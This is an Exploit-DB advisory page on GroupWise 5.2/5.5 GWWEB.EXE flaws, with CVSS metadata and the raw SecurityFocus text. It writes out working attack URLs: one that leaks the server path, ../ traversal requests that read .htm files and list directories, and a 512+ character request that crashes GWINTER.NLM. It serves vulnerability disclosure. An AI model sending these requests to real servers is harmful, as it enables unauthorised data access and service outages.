Netscape Enterprise Server for NetWare 4/5 3.0.7 a,Novell Groupwise 5.2/5.5 GWWEB.EXE Multiple Vulnerabilities

vendor:

Groupwise

by:

SecurityFocus

7.5

CVSS

HIGH

Path Traversal and Buffer Overflow

22, 119

CWE

Product Name: Groupwise

Affected Version From: Novell Groupwise 5.2/5.5

Affected Version To: Novell Groupwise 5.2/5.5

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2001

Netscape Enterprise Server for NetWare 4/5 3.0.7 a,Novell Groupwise 5.2/5.5 GWWEB.EXE Multiple Vulnerabilities

The HELP function in GWWEB.EXE will reveal the path of the server, and combined with the '../' string, allow read access for any client to any .htm file on the server, as well as browseable directory listings. It is also possible to abend GWINTER.NLM by specifying a long string where the server expects a variable setting. Requesting the URL http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=../../../secret.htm or http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=../../../ will allow read access to any .htm file on the server, or browseable directory listings. Requesting the URL http ://victimhost/cgi-bin/GW5/GWWEB.EXE?[512+ chars] will abend GWINTER.NLM and may be possible to remotely execute arbitrary code via this buffer overflow.

Mitigation:

Ensure that the server is running the latest version of the software and that all security patches have been applied.

Source

Exploit-DB raw data:

Netscape Enterprise Server for NetWare 4/5 3.0.7 a,Novell Groupwise 5.2/5.5 GWWEB.EXE Multiple Vulnerabilities

source: https://www.securityfocus.com/bid/879/info

The HELP function in GWWEB.EXE will reveal the path of the server, and combined with the '../' string, allow read access for any client to any .htm file on the server, as well as browseable directory listings.

Also, it is possible to abend GWINTER.NLM by specifying a long string where the server expects a variable setting. 

Requesting the following URL from the GroupWise server
http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=asdf
will return the error message:
Could not read file SYS:WEB\CGI-BIN\GW5\US\HTML3\HELP\ASDF.HTM
revealing the full path of the GroupWise server software.
Note: The URL above may need to be tailored to the target system.

To read .htm files anywhere on the server, or to browse directories, use HELP and the ../ string to traverse directories, for example:
http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=../../../secret.htm
or
http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=../../../
Again, the paths shown above may need to be modified.

To abend GWINTER.NLM request a URL like:
http ://victimhost/cgi-bin/GW5/GWWEB.EXE?[512+ chars]
It may be possible to remotely execute arbitrary code via this buffer overflow.